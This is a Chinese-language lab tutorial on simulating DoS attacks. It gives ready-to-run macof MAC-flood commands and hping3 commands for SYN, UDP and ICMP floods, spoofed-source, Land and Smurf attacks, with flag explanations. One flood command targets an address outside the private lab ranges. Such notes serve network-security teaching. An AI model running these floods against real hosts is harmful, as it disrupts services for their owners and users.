常见DoS有Land、死亡之ping、泪滴、Smurf及SYN洪水等,模拟实验可以尝试以下几种。
实验环境:
kali和ensp桥接到物理机的同一张loopback口网卡上,物理机需要添加一张loopback口网卡。
1、macof 交换机mac地址表容量压力测试
可以指定接入环境的网卡和和MAC地址数量,IP和MAC是随机产生的
macof -i eth1 -n 10000
说明:只有一块网卡可以直接macof即可测试
2、hping3 各种flood洪水测试工具
SYN flood
hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.1
UDP flood
hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.1
ICMP floodI
hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.1
random source IP
hping3 -c 10000 -d 5000 -S -w 64 -p 9090 --flood --rand-source 168.63.19.246
Land
hping3 -S -a 192.168.0.1 -p 3389 192.168.0.1
smurf
hping3 -a 192.168.0.1 --icmp 192.168.0.255

-n --numeric 数字化输出,象征性输出主机地址。
-q --quiet 安静模式
-a --spoof 源地址欺骗,伪造源IP
-s --baseport 随机源端口
-p --destport 目的端口
--id hping中的ID值,默认随机
-c --count 发送数据包的数目
-d --data 发送数据包大小,缺省是0
-S --syn set SYN flag
-w --win win的滑动窗口 (default 64)
--keep 保持源端口
--fload 洪水般发送数据包,不显示回复
--rand-source 随机源地址
--icmp icmp模式
--udp udp模式

说明:
land是原地址和目标地址都被设置成某一个服务器地址,这样就会导致服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接。
smurf最终是导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞或第三方崩溃。

参考:http://www.mamicode.com/info-detail-1153430.html
https://www.jianshu.com/p/87fc3f068554
http://www.elecfans.com/baike/wangluo/anfang/20180117617569.html
https://www.bilibili.com/video/BV1iJ411c7Dc/?spm_id_from=333.788.videocard.16